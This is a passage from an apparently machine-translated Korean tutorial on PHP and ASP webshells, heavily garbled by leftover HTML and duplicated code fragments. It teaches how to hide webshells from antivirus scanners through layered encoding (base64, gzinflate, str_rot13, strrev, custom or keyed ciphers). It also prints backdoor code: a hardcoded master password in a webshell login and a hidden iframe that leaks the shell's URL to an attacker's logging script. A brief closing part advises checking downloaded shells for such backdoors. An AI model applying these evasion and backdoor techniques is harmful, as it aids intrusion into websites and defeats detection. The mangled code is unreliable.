$code 변수는 base4 코드를 저장하는데 사용되며, 실행 시에는 먼저 gzinflate로 압축을 풀고 eval에서 실행됩니다. 실제로 이는 종료로부터 진정으로 보호될 수 없습니다. Base4code 및 eval은 여전히 ​​기능 코드 목록에 포함되어 있으며 스캐너를 통과할 때에도 종료됩니다. <p> (2) ROT13 인코딩(php) </p> <div align="left">str_rot13은 php에서 인코딩을 위해 사용하는 함수입니다. 예를 들어 서명 감지를 우회하기 위해 스크립트 코드를 인코딩하는 데 사용할 수 있습니다. <blockquote><div align="left">file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image031.png<div align="left">그림의 strrev 함수는 서명 감지를 피하기 위해 문자를 반전시키는 데 사용됩니다. , 문자는 '.' 기호로 특별히 구분됩니다. <div align="left">사진 속 str_rot13 3개로 암호화된 문자는 gzinflate, str_rot13, base64_decode로 삼중 암호화에 해당하며 gzinflate, base64_decode라는 두 가지 기능 코드도 피합니다. 그러나 str_rot13을 피할 수는 없습니다. 일부 바이러스 백신 소프트웨어에서는 str_rot13을 기능 코드로 사용할 수도 있습니다. <div align="left">ROT13은 회전 13이 되는데, 이는 현재 문자의 알파벳 빼기 13 위치 값이 암호화된다는 의미입니다. 두 번 암호화하면 원래 값으로 돌아갑니다. 하지만 고정된 알고리즘으로 인해 암호화 강도가 강하지 않습니다. 그리고 크래킹 방법은 매우 간단합니다. 한쪽만 암호화하면 됩니다. <p> (3) 기타 코드 </p> <div align="left"> 일반적으로 바이러스 백신 소프트웨어와 스캐너는 바이러스 유무를 확인하기 위해 서명 코드를 사용합니다. 일반적으로 php 또는 asp 스크립트의 암호화 기능을 사용하여 암호화합니다. 그리고 스캐너(base4, rot13 등)를 우회할 수 있지만, 자신만의 암호화 알고리즘을 작성한 다음 스크립트 코드를 암호화하여 일부 기능 코드를 우회할 수 있다고 생각합니다. Caesar 암호 및 Shift 암호화와 같은 암호화 방법에 대한 몇 가지 아이디어를 사용하고 암호화 알고리즘을 작성한 다음 스크립트 코드를 암호화하면 base4 및 rot3와 같은 기능 코드가 사라지거나 문제없이 직접 만든 암호화를 사용할 수 있습니다. 알고리즘은 서명을 암호화한 다음 사용 시 해독합니다. <div align="left">DES, RSA 등의 키 암호화 알고리즘도 사용할 수 있습니다. 일반적으로 말레이시아에는 비밀번호 로그인 상자가 있으며, 로그인 스크립트의 비밀번호를 복호화 키와 연결하여 올바른 비밀번호를 입력할 수 있습니다. 한편으로는 스캐너나 바이러스 백신 소프트웨어에 의해 탐지되는 것을 방지하는 반면, 다른 사람이 파일을 획득하더라도 암호를 해독하고 소스를 볼 수 없다는 점이 편리합니다. 암호. <p>5. webshell의 백도어에 대하여 </p> <div align="left">일반적으로 말레이시아의 인터넷 다운로드는 대부분 우리가 탈취한 웹사이트로 직접 연결되므로 다른 사람이 이를 탈취하게 됩니다. 온라인으로 다운로드하려면 먼저 백도어가 있는지 확인해야 합니다. <div align="left">예를 들어 범용 비밀번호는 다음과 같습니다. <div align="left"><div data-settings=" minimize scroll-mouseover"><div data-settings=" show"> <p><span>기본값</span></p> <p><textarea read data-settings="dblclick">최종 기능 if session("hehe")<>userpassthen ifrequest.form("pass")<>"" 그러면 if request.form("pass")=userpassor request.form("pass")="1111111" 그런 다음 세션("헤헤")=사용자패스 응답.리디렉션 URL else</textarea></p> <p></p> <tbody><tr> <td data-settings="show"> <table><tbody><tr> <td data-settings="show"> <p></p> <div data-line="crayon-559e92dfe41ee319943165-1">1<div data-line="crayon-559e92dfe41ee319943165-2">2<div data-line="crayon-559e92dfe41ee319943165-3">3<div data-line="crayon-559e92dfe41ee319943165-4">4<div data-line="crayon-559e92dfe41ee319943165-5">5<div data-line="crayon-559e92dfe41ee319943165-6">6<div data-line="crayon-559e92dfe41ee319943165-7">7</div> </div> </div> </div> </div> </div> </div> </td> <td> <p></p> <p><span>end<span><span>function</span></span></span></p> <p><span>if<span><span>session<span>(<span>"hehe"<span>)<span><><span>userpassthen</span></span></span></span></span></span></span></span></p> <p><span>ifrequest<span>.<span>form<span>(<span>"pass"<span>)<span><><span>""<span><span>then</span></span></span></span></span></span></span></span></span></span></p> <p><span>if<span><span>request<span>.<span>form<span>(<span>"pass"<span>)<span>=<span>userpassor <span>request<span>.<span>form<span>(<span>"pass"<span>)<span>=<span>"1111111"<span><span>Then</span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></p> <p><span>session<span>(<span>"hehe"<span>)<span>=<span>userpasss</span></span></span></span></span></span></p> <p><span>response<span>.<span>redirect <span>url</span></span></span></span></p> <p><span>else</span></p> </td> </tr></tbody></table> <div data-line="crayon-559e92dfe41ee319943165-1">1 <div data-line="crayon-559e92dfe41ee319943165-2">2<div data-line="crayon-559e92dfe41ee319943165-3">3<div data-line="crayon-559e92dfe41ee319943165-4"> 4<div data-line="crayon-559e92dfe41ee319943165-5">5<div data-line="crayon-559e92dfe41ee319943165-6">6<div data-line="crayon-559e92dfe41ee319943165 -7">7</div> </div> </div> </div> </div> </div> </div> </td> <td>종료기능 if세션("헤헤")<>userpassthen요청 시.양식("통과")<>"그럼 if요청.양식("pass")=userpassor 요청.양식 ("통과")="1111111"그럼 세션("헤헤")=userpasss 응답.리디렉션 urlelse</td> tr></tr></tbody> <div align="left"> <p>여기</p> <div data-settings=" minimize scroll-mouseover"><div data-settings=" show"> <p><span>기본</span></p> <p><textarea read data-settings="dblclick">request.form ("pass")=userpass</textarea></p> <p></p> <table> <tbody><tr> <td data-settings="show"> <table><tbody><tr> <td data-settings="show"> <p></p> <div data-line="crayon-559e92dfe41f9833410747-1">1</div> </td> <td> <p></p> <p><span>request<span>.<span>form<span>(<span>"pass"<span>)<span>=<span>userpass</span></span></span></span></span></span></span></span></p> </td> </tr></tbody></table> <div data-line="crayon-559e92dfe41f9833410747-1 ">1</div> </td> <td> <p></p>요청<div align="left">.<div data-settings=" minimize scroll-mouseover">양식<div data-settings=" show">(<p>"통과"<span>)</span>=</p>사용자 비밀번호<p><textarea read data-settings="dblclick"></textarea></p> <p></p> <table><tbody><tr> <td data-settings="show"> <p></p> <div data-line="crayon-559e92dfe4200896853458-1">1</div> </td> <td> <p></p> <p><span>orrequest<span>.<span>from<span>(“<span>pass”<span>)<span>=”<span>1111111”</span></span></span></span></span></span></span></span></p> </td> </tr></tbody></table> <br> </div> </div> </div> </td> </tr></tbody> table><div align="left"> <p>은 원래 pass 값을 검증하는데 사용되었는데, 입력한 pass 값이 userpass와 같다면 검증에 성공한 것인데 나중에는 </p> <div data-settings=" minimize scroll-mouseover"><div data-settings=" show"> <p> <span></span></p>기본값<p><textarea read data-settings="dblclick"></textarea></p>orrequest.from(“pass”)=”1111111”<p></p> <table><tbody><tr> <td data-settings="show"> <p></p> <div data-line="crayon-559e92dfe4206898448213-1">1</div> </td> <td> <p></p> <p><span><<span>iframe <span>src<span>=后门地址<span><span>width<span>=<span>0<span><span>height<span>=<span>0<span>><span><<span>/<span>iframe<span>></span></span></p> </td> </tr></tbody></table> <table> <tr> <td data-settings="show"><div data-line="crayon-559e92dfe4200896853458-1">1<p></p> </div></td> <td><div data-settings=" minimize scroll-mouseover"> <div data-settings=" show"> <p>또는 요청<span title="含多种语言">.<span>from</span>(“</span>pass”</p>)=”<p>1111111”<textarea read data-settings="dblclick"></textarea></p> <p> </p> <table><tbody><tr> <td data-settings="show"> <p></p> <div data-line="crayon-559e92dfe420d673277667-1">1<div data-line="crayon-559e92dfe420d673277667-2">2<div data-line="crayon-559e92dfe420d673277667-3">3<div data-line="crayon-559e92dfe420d673277667-4">4<div data-line="crayon-559e92dfe420d673277667-5">5<div data-line="crayon-559e92dfe420d673277667-6">6<div data-line="crayon-559e92dfe420d673277667-7">7<div data-line="crayon-559e92dfe420d673277667-8">8</div> </div> </div> </div> </div> </div> </div> </div> </td> <td> <p></p> <p><span><%<span>url<span>=<span>Request<span>.<span>ServerVariables<span>(<span>"HTTP_Referer"<span>)</span></span></span></span></span></span></span></span></span></p><p><span>set<span><span>fs<span>=<span>server<span>.<span>CreateObject<span>(<span>"Scripting.FileSystemObject"<span>)</span></span></span></span></span></span></span></span></span></span></p><p><span>set<span><span>file<span>=<span>fs<span>.<span>OpenTextFile<span>(<span>server<span>.<span>MapPath<span>(<span>"hehe.txt"<span>)<span>,<span>8<span>,<span>True<span>)</span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></p><p><span>file<span>.<span>writeline<span><span>url</span></span></span></span></span></p><p><span>file<span>.<span>close</span></span></span></p><p><span>set<span><span>file<span>=<span>nothing</span></span></span></span></span></p><p><span>set<span><span>fs<span>=<span>nothing</span></span></span></span></span></p><p><span>%></span></p> </td> </tr></tbody></table> </div> </div></td> </tr> </table>은 입력된 합격 값이 1111111 이므로 말레이시아에서도 로그인이 가능합니다. 물론 이 곳이 그렇게 간단할 수는 없습니다. 원저자는 userpass 값을 2개에 할당하고 1개를 추가할 수 있습니다. userpass 변경에 대한 트리거 조건은 로그인 시 트리거됩니다(예: 로그인에 실패하면 userpass 값 업데이트가 트리거됨). 접미사를 추가할 수 있으며, 게다가 트리거 조건 코드와 인증 코드가 멀리 떨어져 있어 찾기도 어렵습니다. 이때 말레이시아 코드를 한 줄씩 분석해야 합니다. 그런 다음 프레임을 사용하여 말을 장착합니다. 기본값< ;iframe src=백도어 주소 폭=0 높이=0></iframe><table><tbody><tr> <td data-settings="show">1</td> <td><<🎜>iframe <🎜>src<🎜>= 백도어 주소 <🎜><🎜>너비<🎜>=<🎜>0<🎜><🎜>높이<🎜>=<🎜>0<🎜>><<🎜>/<🎜>iframe <🎜 >> </td> </tr></tbody></table>링크 주소의 너비와 높이를 0으로 설정한 곳입니다. . 페이지가 숨겨져 있습니다. 내부의 "백도어 주소"는 자신의 스크립트 수신기를 가리킵니다. 마지막으로 수신 스크립트를 구축한 공용 네트워크 서버에 넣습니다. 기본값<%url=Request.ServerVariables("HTTP_Referer") ​set fs=server.CreateObject("Scripting.FileSystemObject") 파일 설정=fs.OpenTextFile(server.MapPath("hehe.txt"),8,True) file.writelineurl 파일.닫기 파일 설정 = 없음 fs=아무것도 설정하지 않음 %><tbody><tr> <td data-settings="show"><div data-line="crayon-559e92dfe420d673277667-1">1<div data-line="crayon-559e92dfe420d673277667-2">2<div data-line="crayon-559e92dfe420d673277667-3">3<div data-line="crayon-559e92dfe420d673277667-4 ">4<div data-line="crayon-559e92dfe420d673277667-5">5<div data-line="crayon-559e92dfe420d673277667-6">6<div data-line="crayon -559e92dfe420d673277667-7">7<div data-line="crayon-559e92dfe420d673277667-8">8</div> </div> </div> </div> </div> </div> </div> </div></td> <td><% <🎜>url<🎜>=<🎜>요청<🎜>.<🎜>ServerVariables<🎜>(<🎜>"HTTP_Referer"<🎜>)<🎜><🎜><🎜><🎜><🎜>< 🎜><🎜><🎜><🎜><🎜><🎜><🎜>설정<🎜><🎜>fs<🎜>=<🎜>서버<🎜>.<🎜>CreateObject<🎜>(<🎜 >"Scripting.FileSystemObject"<🎜>)<🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜>세트 <🎜><🎜>파일<🎜>=<🎜>fs<🎜>.<🎜>OpenTextFile<🎜>(<🎜>서버<🎜>.<🎜>MapPath<🎜>(<🎜>"hehe.txt "<🎜>)<🎜>,<🎜>8<🎜>,<🎜>맞습니다<🎜>)<🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜>< 🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜>파일<🎜>.<🎜>writeline <🎜><🎜>url<🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜>파일<🎜>.<🎜>닫기<🎜><🎜><🎜>< 🎜><🎜><🎜>설정<🎜><🎜>파일<🎜>=<🎜>없음<🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜>설정< 🎜><🎜>fs<🎜>=<🎜>아무것도<🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜>%> </td> </tr></tbody> </div></div> </div> </table> <div align="left"><div align="left"> <p>어디</p> <div data-settings=" minimize scroll-mouseover"><div data-settings=" show"> <p><span>기본</span></p> <p><textarea read data-settings="dblclick"> url=Request.ServerVariables("HTTP_Referer")</textarea></p> <p></p> <table><tbody><tr> <td data-settings="show"> <table><tbody><tr> <td data-settings="show"> <p></p> <div data-line="crayon-559e92dfe4213010815510-1">1</div> </td> <td> <p></p> <p><span>url<span>=<span>Request<span>.<span>ServerVariables<span>(<span>"HTTP_Referer"<span>)</span></span></span></span></span></span></span></span></p> </td> </tr></tbody></table> <div data-line="crayon- 559e92dfe4213010815510-1">1</div> </td> <td> <p></p>url=<div align="left">요청.<p>ServerVariables</p>(<p>"HTTP_Referer"</p>)</div> </td> </tr></tbody></table>은 요청한 문자 변환 내용, 즉 말레이시아 URL 주소를 나타내고, 해당 URL 주소를 현재 디렉터리의 hehe.txt에 저장합니다. 이런 종류의 백도어를 만들려면 먼저 말레이시아의 두 번째 유형의 비밀번호 인증인 마스터 비밀번호를 파기해야 합니다. 해당 함수코드를 삭제한 후 ASP Malaysia 페이지에 width=0 height=0 등 숨겨진 URL이 있는지 확인 후 찾아 삭제하세요. 위에서 Webshell 구현과 숨겨진 탐색 기능을 소개했으며, PHP 튜토리얼에 관심이 있는 친구들에게 도움이 되기를 바랍니다. </div></div> </div></div> </div></div> </div> </div></div></div> </div> </div> </div> </div> </div> </div> </div> </div></blockquote> </div> </div> </div></div> </div> </div></div></div> </div> </div></div></div> </div></div> </div> </div></div></div> </div> </div> </div> </div></div> </div> </div></blockquote> </div> </div> </div></div> </div> </div></div></div> </div> </div> </div> </div> </div></blockquote> </div> </div></blockquote> </div> </div></div> </div> </div> </div></div> </div> </div></div> </div> </div></blockquote> </div> </div> </blockquote> </div> </div> </div> </div></blockquote> </div> </div></blockquote> </div> </div></blockquote> </div></div> </div> </div> </h3> </div> </h3> </div> </div> </div> </div> </h3> </div> </div></div> </div> </h3> </div> </h3> </div> </div> </div> </div> </div> </div></div></div> </div> </div> </div> </div> <div style="height: 25px;"> <div class="wzconBq" style="display: inline-flex;"> <span>관련 라벨:</span> <div class="wzcbqd"> <a onclick="hits_log(2,'www',this);" href-data="https://www.php.cn/ko/search?word=gt" target="_blank">gt</a> <a onclick="hits_log(2,'www',this);" href-data="https://www.php.cn/ko/search?word=lt" target="_blank">lt</a> <a onclick="hits_log(2,'www',this);" href-data="https://www.php.cn/ko/search?word=nbsp" target="_blank">nbsp</a> <a onclick="hits_log(2,'www',this);" href-data="https://www.php.cn/ko/search?word=php" target="_blank">php</a> <a onclick="hits_log(2,'www',this);" href-data="https://www.php.cn/ko/search?word=request" target="_blank">request</a> </div> </div> <div style="display: inline-flex;float: right; color:#333333;">원천:php.cn</div> </div> <div class="wzconOtherwz"> <a href="https://www.php.cn/ko/faq/331225.html" title="PHP는 IP(예: 127001)와 여러 도메인 이름(가상 호스트)의 바인딩을 실현합니다."> <span>이전 기사:PHP는 IP(예: 127001)와 여러 도메인 이름(가상 호스트)의 바인딩을 실현합니다.</span> </a> <a href="https://www.php.cn/ko/faq/331227.html" title="NGINX 소개 및 매개변수"> <span>다음 기사:NGINX 소개 및 매개변수</span> </a> </div> <div class="wzconShengming"> <div class="bzsmdiv">본 웹사이트의 성명</div> <div>본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.</div> </div> <div class="wwads-cn wwads-horizontal" data-id="156" style="max-width:955px"></div> <div class="wzconZzwz"> <div class="wzconZzwztitle">저자별 최신 기사</div> <ul> <li> <div class="wzczzwzli"> <span class="layui-badge-dots"></span> <a target="_blank" href="https://www.php.cn/ko/faq/1796639331.html">NullPointerException은 무엇이며 어떻게 해결합니까?</a> </div> <div>2024-10-22 09:46:29</div> </li> <li> <div class="wzczzwzli"> <span class="layui-badge-dots"></span> <a target="_blank" href="https://www.php.cn/ko/faq/1796629482.html">초보자에서 코더까지: C 기초로 시작되는 여정</a> </div> <div>2024-10-13 13:53:41</div> </li> <li> <div class="wzczzwzli"> <span class="layui-badge-dots"></span> <a target="_blank" href="https://www.php.cn/ko/faq/1796628545.html">PHP로 웹 개발 잠금 해제: 초보자 가이드</a> </div> <div>2024-10-12 12:15:51</div> </li> <li> <div class="wzczzwzli"> <span class="layui-badge-dots"></span> <a target="_blank" href="https://www.php.cn/ko/faq/1796627928.html">C에 대한 이해: 새로운 프로그래머를 위한 명확하고 간단한 길</a> </div> <div>2024-10-11 22:47:31</div> </li> <li> <div class="wzczzwzli"> <span class="layui-badge-dots"></span> <a target="_blank" href="https://www.php.cn/ko/faq/1796627806.html">코딩 잠재력 발휘: 완전 초보자를 위한 C 프로그래밍</a> </div> <div>2024-10-11 19:36:51</div> </li> <li> <div class="wzczzwzli"> <span class="layui-badge-dots"></span> <a target="_blank" href="https://www.php.cn/ko/faq/1796627670.html">내면의 프로그래머를 깨워보세요: 완전 초보자를 위한 C</a> </div> <div>2024-10-11 15:50:41</div> </li> <li> <div class="wzczzwzli"> <span class="layui-badge-dots"></span> <a target="_blank" href="https://www.php.cn/ko/faq/1796627643.html">C로 일상을 자동화하세요: 초보자를 위한 스크립트 및 도구</a> </div> <div>2024-10-11 15:07:41</div> </li> <li> <div class="wzczzwzli"> <span class="layui-badge-dots"></span> <a target="_blank" href="https://www.php.cn/ko/faq/1796627620.html">PHP가 쉬워졌습니다: 웹 개발의 첫 번째 단계</a> </div> <div>2024-10-11 14:21:21</div> </li> <li> <div class="wzczzwzli"> <span class="layui-badge-dots"></span> <a target="_blank" href="https://www.php.cn/ko/faq/1796627574.html">Python으로 무엇이든 빌드하기: 창의력을 발휘하기 위한 초보자 가이드</a> </div> <div>2024-10-11 12:59:11</div> </li> <li> <div class="wzczzwzli"> <span class="layui-badge-dots"></span> <a target="_blank" href="https://www.php.cn/ko/faq/1796627539.html">코딩의 핵심: 초보자를 위한 Python의 힘 활용</a> </div> <div>2024-10-11 12:17:31</div> </li> </ul> </div> <div class="wzconZzwz"> <div class="wzconZzwztitle">최신 이슈</div> <div class="wdsyContent"> <div class="wdsyConDiv flexRow wdsyConDiv1"> <div class="wdcdContent flexColumn"> <a href="https://www.php.cn/ko/wenda/176411.html" target="_blank" title="function_exists()는 사용자 정의 함수를 결정할 수 없습니다." class="wdcdcTitle">function_exists()는 사용자 정의 함수를 결정할 수 없습니다.</a> <a href="https://www.php.cn/ko/wenda/176411.html" class="wdcdcCons">기능 테스트() {                                                                                ...</a> <div class="wdcdcInfo flexRow"> <div class="wdcdcileft"> <span class="wdcdciSpan"> 에서 2024-04-29 11:01:01</span> </div> <div class="wdcdciright flexRow"> <div class="wdcdcirdz flexRow ira"> <b class="wdcdcirdzi"></b>0 </div> <div class="wdcdcirpl flexRow ira"><b class="wdcdcirpli"></b>2</div> <div class="wdcdcirwatch flexRow ira"><b class="wdcdcirwatchi"></b>1429</div> </div> </div> </div> </div> <div class="wdsyConLine wdsyConLine2"></div> <div class="wdsyConDiv flexRow wdsyConDiv1"> <div class="wdcdContent flexColumn"> <a href="https://www.php.cn/ko/wenda/176406.html" target="_blank" title="상위 창에 출력이 없습니다." class="wdcdcTitle">상위 창에 출력이 없습니다.</a> <a href="https://www.php.cn/ko/wenda/176406.html" class="wdcdcCons">document.onclick = function(){ window.opener.document.write('나는 자식 창의 출력입니다.');</a> <div class="wdcdcInfo flexRow"> <div class="wdcdcileft"> <span class="wdcdciSpan"> 에서 2024-04-18 23:52:34</span> </div> <div class="wdcdciright flexRow"> <div class="wdcdcirdz flexRow ira"> <b class="wdcdcirdzi"></b>0 </div> <div class="wdcdcirpl flexRow ira"><b class="wdcdcirpli"></b>1</div> <div class="wdcdcirwatch flexRow ira"><b class="wdcdcirwatchi"></b>1284</div> </div> </div> </div> </div> <div class="wdsyConLine wdsyConLine2"></div> <div class="wdsyConDiv flexRow wdsyConDiv1"> <div class="wdcdContent flexColumn"> <a href="https://www.php.cn/ko/wenda/176403.html" target="_blank" title="PX가 REM 오류로 자동 변환" class="wdcdcTitle">PX가 REM 오류로 자동 변환</a> <a href="https://www.php.cn/ko/wenda/176403.html" class="wdcdcCons"> <style>html {   글꼴 크기: calc(100vw / 3.75);      }body {    글꼴 크기: 0.16rem;      }&l...</a> <div class="wdcdcInfo flexRow"> <div class="wdcdcileft"> <span class="wdcdciSpan"> 에서 2024-04-16 09:34:16</span> </div> <div class="wdcdciright flexRow"> <div class="wdcdcirdz flexRow ira"> <b class="wdcdcirdzi"></b>0 </div> <div class="wdcdcirpl flexRow ira"><b class="wdcdcirpli"></b>0</div> <div class="wdcdcirwatch flexRow ira"><b class="wdcdcirwatchi"></b>4687</div> </div> </div> </div> </div> <div class="wdsyConLine wdsyConLine2"></div> </div> </div> <div class="wzconZt" > <div class="wzczt-title"> <div>관련 주제</div> <a href="https://www.php.cn/ko/faq/zt" target="_blank">더> </a> </div> <div class="wzcttlist"> <ul> <li class="ul-li"> <a target="_blank" href="https://www.php.cn/ko/faq/phpwjzmdk"><img src="https://img.php.cn/upload/subject/202407/22/2024072214120868901.jpg?x-oss-process=image/resize,m_fill,h_145,w_220" alt="PHP 파일을 여는 방법" /> </a> <a target="_blank" href="https://www.php.cn/ko/faq/phpwjzmdk" class="title-a-spanl" title="PHP 파일을 여는 방법"><span>PHP 파일을 여는 방법</span> </a> </li> <li class="ul-li"> <a target="_blank" href="https://www.php.cn/ko/faq/phpzmqcszys"><img src="https://img.php.cn/upload/subject/202407/22/2024072214004499289.jpg?x-oss-process=image/resize,m_fill,h_145,w_220" alt="PHP에서 배열의 처음 몇 요소를 제거하는 방법" /> </a> <a target="_blank" href="https://www.php.cn/ko/faq/phpzmqcszys" class="title-a-spanl" title="PHP에서 배열의 처음 몇 요소를 제거하는 방법"><span>PHP에서 배열의 처음 몇 요소를 제거하는 방법</span> </a> </li> <li class="ul-li"> <a target="_blank" href="https://www.php.cn/ko/faq/phpfxlsb"><img src="https://img.php.cn/upload/subject/202407/22/2024072214003558557.jpg?x-oss-process=image/resize,m_fill,h_145,w_220" alt="PHP 역직렬화가 실패하면 어떻게 해야 할까요?" /> </a> <a target="_blank" href="https://www.php.cn/ko/faq/phpfxlsb" class="title-a-spanl" title="PHP 역직렬화가 실패하면 어떻게 해야 할까요?"><span>PHP 역직렬화가 실패하면 어떻게 해야 할까요?</span> </a> </li> <li class="ul-li"> <a target="_blank" href="https://www.php.cn/ko/faq/phpljmssql"><img src="https://img.php.cn/upload/subject/202407/22/2024072213560082376.jpg?x-oss-process=image/resize,m_fill,h_145,w_220" alt="PHP를 mssql 데이터베이스에 연결하는 방법" /> </a> <a target="_blank" href="https://www.php.cn/ko/faq/phpljmssql" class="title-a-spanl" title="PHP를 mssql 데이터베이스에 연결하는 방법"><span>PHP를 mssql 데이터베이스에 연결하는 방법</span> </a> </li> <li class="ul-li"> <a target="_blank" href="https://www.php.cn/ko/faq/phpljmssqlsjk"><img src="https://img.php.cn/upload/subject/202407/22/2024072213555538594.jpg?x-oss-process=image/resize,m_fill,h_145,w_220" alt="PHP를 mssql 데이터베이스에 연결하는 방법" /> </a> <a target="_blank" href="https://www.php.cn/ko/faq/phpljmssqlsjk" class="title-a-spanl" title="PHP를 mssql 데이터베이스에 연결하는 방법"><span>PHP를 mssql 데이터베이스에 연결하는 방법</span> </a> </li> <li class="ul-li"> <a target="_blank" href="https://www.php.cn/ko/faq/htmlzmsc"><img src="https://img.php.cn/upload/subject/202407/22/2024072213512540557.jpg?x-oss-process=image/resize,m_fill,h_145,w_220" alt="HTML을 업로드하는 방법" /> </a> <a target="_blank" href="https://www.php.cn/ko/faq/htmlzmsc" class="title-a-spanl" title="HTML을 업로드하는 방법"><span>HTML을 업로드하는 방법</span> </a> </li> <li class="ul-li"> <a target="_blank" href="https://www.php.cn/ko/faq/phpcxlmzmjj"><img src="https://img.php.cn/upload/subject/202407/22/2024072213494787127.jpg?x-oss-process=image/resize,m_fill,h_145,w_220" alt="PHP에서 잘못된 문자를 해결하는 방법" /> </a> <a target="_blank" href="https://www.php.cn/ko/faq/phpcxlmzmjj" class="title-a-spanl" title="PHP에서 잘못된 문자를 해결하는 방법"><span>PHP에서 잘못된 문자를 해결하는 방법</span> </a> </li> <li class="ul-li"> <a target="_blank" href="https://www.php.cn/ko/faq/phpwjzmzsjsdk"><img src="https://img.php.cn/upload/subject/202407/22/2024072213484482977.jpg?x-oss-process=image/resize,m_fill,h_145,w_220" alt="휴대폰에서 PHP 파일을 여는 방법" /> </a> <a target="_blank" href="https://www.php.cn/ko/faq/phpwjzmzsjsdk" class="title-a-spanl" title="휴대폰에서 PHP 파일을 여는 방법"><span>휴대폰에서 PHP 파일을 여는 방법</span> </a> </li> </ul> </div> </div> </div> </div> <div class="phpwzright"> <div class="wzrOne"> <div class="wzroTitle">인기 추천</div> <div class="wzroList"> <ul> <li> <div class="wzczzwzli"> <span class="layui-badge-dots wzrolr"></span> <a style="height: auto;" title="Mac 컴퓨터에서 호스트를 설정하는 방법(그림과 텍스트가 포함된 단계)" href="https://www.php.cn/ko/faq/448310.html">Mac 컴퓨터에서 호스트를 설정하는 방법(그림과 텍스트가 포함된 단계)</a> </div> </li> <li> <div class="wzczzwzli"> <span class="layui-badge-dots wzrolr"></span> <a style="height: auto;" title="PHP로 간단한 QQ 로봇을 빠르게 구축하세요" href="https://www.php.cn/ko/faq/448391.html">PHP로 간단한 QQ 로봇을 빠르게 구축하세요</a> </div> </li> <li> <div class="wzczzwzli"> <span class="layui-badge-dots wzrolr"></span> <a style="height: auto;" title="API 공통 서명 확인 방법(PHP 구현)" href="https://www.php.cn/ko/faq/448286.html">API 공통 서명 확인 방법(PHP 구현)</a> </div> </li> <li> <div class="wzczzwzli"> <span class="layui-badge-dots wzrolr"></span> <a style="height: auto;" title="PHP의 일반적인 날짜 및 시간 작업 모음" href="https://www.php.cn/ko/faq/448309.html">PHP의 일반적인 날짜 및 시간 작업 모음</a> </div> </li> <li> <div class="wzczzwzli"> <span class="layui-badge-dots wzrolr"></span> <a style="height: auto;" title="PHP는 그래픽 인증 코드를 생성합니다(강화된 간섭 유형)." href="https://www.php.cn/ko/faq/448308.html">PHP는 그래픽 인증 코드를 생성합니다(강화된 간섭 유형).</a> </div> </li> </ul> </div> </div> <script src="https://sw.php.cn/hezuo/cac1399ab368127f9b113b14eb3316d0.js" type="text/javascript"></script> <div class="wzrThree"> <div class="wzrthree-title"> <div>인기 튜토리얼</div> <a target="_blank" href="https://www.php.cn/ko/course.html">더> </a> </div> <div class="wzrthreelist swiper2"> <div class="wzrthreeTab swiper-wrapper"> <div class="check tabdiv swiper-slide" data-id="one">관련 튜토리얼 <div></div></div> <div class="tabdiv swiper-slide" data-id="two">인기 추천<div></div></div> <div class="tabdiv swiper-slide" data-id="three">최신 강좌<div></div></div> </div> <ul class="one"> <li> <a target="_blank" href="https://www.php.cn/ko/course/812.html" title="최신 ThinkPHP 5.1 세계 최초 비디오 튜토리얼(PHP 전문가 온라인 교육 과정이 되기까지 60일)" class="wzrthreelaimg"> <img src="https://img.php.cn/upload/course/000/000/041/620debc3eab3f377.jpg" alt="최신 ThinkPHP 5.1 세계 최초 비디오 튜토리얼(PHP 전문가 온라인 교육 과정이 되기까지 60일)"/> </a> <div class="wzrthree-right"> <a target="_blank" title="최신 ThinkPHP 5.1 세계 최초 비디오 튜토리얼(PHP 전문가 온라인 교육 과정이 되기까지 60일)" href="https://www.php.cn/ko/course/812.html">최신 ThinkPHP 5.1 세계 최초 비디오 튜토리얼(PHP 전문가 온라인 교육 과정이 되기까지 60일)</a> <div class="wzrthreerb"> <div>1420568 <b class="kclbcollectb"></b></div> <div class="courseICollection" data-id="812"> <b class="nofollow small-nocollect"></b> </div> </div> </div> </li> <li> <a target="_blank" href="https://www.php.cn/ko/course/74.html" title="PHP 입문 튜토리얼 1: 일주일 안에 PHP 배우기" class="wzrthreelaimg"> <img src="https://img.php.cn/upload/course/000/000/068/6253d1e28ef5c345.png" alt="PHP 입문 튜토리얼 1: 일주일 안에 PHP 배우기"/> </a> <div class="wzrthree-right"> <a target="_blank" title="PHP 입문 튜토리얼 1: 일주일 안에 PHP 배우기" href="https://www.php.cn/ko/course/74.html">PHP 입문 튜토리얼 1: 일주일 안에 PHP 배우기</a> <div class="wzrthreerb"> <div>4263898 <b class="kclbcollectb"></b></div> <div class="courseICollection" data-id="74"> <b class="nofollow small-nocollect"></b> </div> </div> </div> </li> <li> <a target="_blank" href="https://www.php.cn/ko/course/286.html" title="JAVA 초보자용 비디오 튜토리얼" class="wzrthreelaimg"> <img src="https://img.php.cn/upload/course/000/000/068/62590a2bacfd9379.png" alt="JAVA 초보자용 비디오 튜토리얼"/> </a> <div class="wzrthree-right"> <a target="_blank" title="JAVA 초보자용 비디오 튜토리얼" href="https://www.php.cn/ko/course/286.html">JAVA 초보자용 비디오 튜토리얼</a> <div class="wzrthreerb"> <div>2509499 <b class="kclbcollectb"></b></div> <div class="courseICollection" data-id="286"> <b class="nofollow small-nocollect"></b> </div> </div> </div> </li> <li> <a target="_blank" href="https://www.php.cn/ko/course/504.html" title="Little Turtle의 Python 학습에 대한 제로 기반 소개 비디오 튜토리얼" class="wzrthreelaimg"> <img src="https://img.php.cn/upload/course/000/000/068/62590a67ce3a6655.png" alt="Little Turtle의 Python 학습에 대한 제로 기반 소개 비디오 튜토리얼"/> </a> <div class="wzrthree-right"> <a target="_blank" title="Little Turtle의 Python 학습에 대한 제로 기반 소개 비디오 튜토리얼" href="https://www.php.cn/ko/course/504.html">Little Turtle의 Python 학습에 대한 제로 